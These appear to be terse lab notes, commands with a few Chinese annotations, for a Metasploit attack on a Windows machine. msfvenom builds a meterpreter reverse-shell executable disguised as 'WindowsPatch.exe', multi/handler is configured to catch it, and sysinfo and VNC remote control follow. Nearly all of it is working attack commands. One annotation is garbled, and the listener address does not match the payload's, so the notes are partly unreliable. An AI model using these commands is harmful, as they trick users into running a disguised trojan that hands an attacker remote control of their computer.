msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 exe > /root/Desktop/WindowsPatch.exe
msfconsole
use multi/handler
4. 璁剧疆payload
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.41 set LPORT 4444
run
获取系统信息 sysinfo 利用vnc对靶机进行图形化远程控制 run vnc